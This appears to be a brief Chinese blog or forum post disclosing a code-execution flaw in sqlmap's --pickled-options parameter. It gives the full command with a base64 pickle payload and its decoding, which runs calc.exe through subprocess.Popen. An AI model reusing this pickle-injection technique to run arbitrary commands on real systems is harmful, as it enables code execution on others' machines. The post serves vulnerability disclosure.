漏洞POC: sqlmap.py -u "http://www.baidu.com/s?wd=sqli" --pickled-options "Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKFMnY2FsYy5leGUnCnAyCnRwMwpScDQKLg=="
base64解码
csubprocessPopenp1(S'calc.exe'p2tp3Rp4.
是个本地利用的,不过也有一些场景的,“漏洞”出在 pickled-options 参数上。
sqlmap代码执行漏洞
Mysql 漏洞利用越权读取文件
chrome扩展: hack-http-header(修改版)
>
评论回复